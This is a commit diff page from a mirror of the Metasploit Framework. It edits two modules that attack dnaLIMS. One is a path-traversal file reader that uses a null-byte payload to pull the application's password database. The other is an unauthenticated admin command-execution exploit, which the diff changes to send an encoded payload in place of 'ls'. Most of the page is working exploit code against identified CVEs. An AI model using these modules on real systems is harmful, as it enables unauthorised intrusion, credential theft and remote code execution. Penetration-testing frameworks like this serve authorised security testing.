infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #3 from h00die/flakeydna 

dnalims
bug/bundler_fix
Flaky Biscuits 2017-03-20 10:59:52 -04:00 committed by GitHub
parent 0ab3ad86ee fd5345a869
commit a7671397ba
2 changed files with 15 additions and 21 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

22
modules/exploits/linux/http/dnalims_file_retrieve.rb → modules/auxiliary/scanner/http/dnalims_file_retrieve.rb
View File

@ -1,5 +1,3 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
@ -7,8 +5,7 @@
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
@ -24,14 +21,14 @@ class MetasploitModule < Msf::Exploit::Remote
},
'References' =>
[
['CVE', '2017-6527']
['US-CERT-VU', '929263']
['CVE', '2017-6527'],
['US-CERT-VU', '929263'],
['URL', 'https://www.shorebreaksecurity.com/blog/product-security-advisory-psa0002-dnalims/']
],
'Author' =>
[
'h00die', # Discovery, PoC
'flakey_biscuit' # Discovery, PoC
'h00die <mike@shorebreaksecurity.com>', # Discovery, PoC
'flakey_biscuit <nicholas@shorebreaksecurity.com>' # Discovery, PoC
],
'License' => MSF_LICENSE,
'DisclosureDate' => "Mar 8 2017"
@ -40,8 +37,8 @@ class MetasploitModule < Msf::Exploit::Remote
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to dnaLIMS', '/cgi-bin/dna/']),
OptString.new('FILE', [ true, "The path to the file to view", '/etc/passwd']),
OptInt.new('DEPTH', [true, 'The max traversal depth', 11])
OptString.new('FILE', [ true, "The path to the file to view", '/home/dna/spool/.pfile']), # password db for app
OptInt.new('DEPTH', [true, 'The traversal depth', 4])
], self.class)
deregister_options('RHOST')
@ -57,7 +54,7 @@ class MetasploitModule < Msf::Exploit::Remote
print_status("Requesting: #{file} - #{rhost}")
res = send_request_cgi({
'uri' => "#{base}/viewAppletFsa.cgi",
'vars_get' => { 'secID' => "#{traverse}#{file}",
'vars_get' => { 'secID' => "#{traverse}#{file}%00",
'Action' => 'blast',
'hidenav' => '1'
}
@ -68,14 +65,13 @@ class MetasploitModule < Msf::Exploit::Remote
return
end
if res.code != 200
print_error("Server returned a non-200 response (body will not be saved):")
print_line(res.to_s)
return
end
vprint_line(res.body)
vprint_good(res.body)
p = store_loot('dnaLIMS.traversal.file', 'application/octet-stream', ip, res.body, File.basename(file))
print_good("File saved as: #{p}")
end

14
modules/exploits/linux/http/dnalims_admin_exec.rb
View File

@ -1,5 +1,3 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
@ -18,18 +16,18 @@ class MetasploitModule < Msf::Exploit::Remote
'Description' => %q{
This module utilizes an administrative module which allows for
command execution. This page is completely unprotected from any
authentication when given a POST command.
authentication when given a POST request.
},
'Author' =>
[
'h00die <mike@stcyrsecurity.com>', # Discovery, PoC
'flakey_biscuit' # Discovery, PoC
'h00die <mike@shorebreaksecurity.com>', # Discovery, PoC
'flakey_biscuit <nicholas@shorebreaksecurity.com>' # Discovery, PoC
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2017-6526']
['US-CERT-VU', '929263']
['CVE', '2017-6526'],
['US-CERT-VU', '929263'],
['URL', 'https://www.shorebreaksecurity.com/blog/product-security-advisory-psa0002-dnalims/']
],
'Platform' => %w( linux unix ),
@ -96,7 +94,7 @@ class MetasploitModule < Msf::Exploit::Remote
'username' => '',
'navUserName' => '',
'Action' => 'executeCmd',
'executeCmdData' => 'ls',
'executeCmdData' => payload.encoded,
}
)
vprint_good(res.body)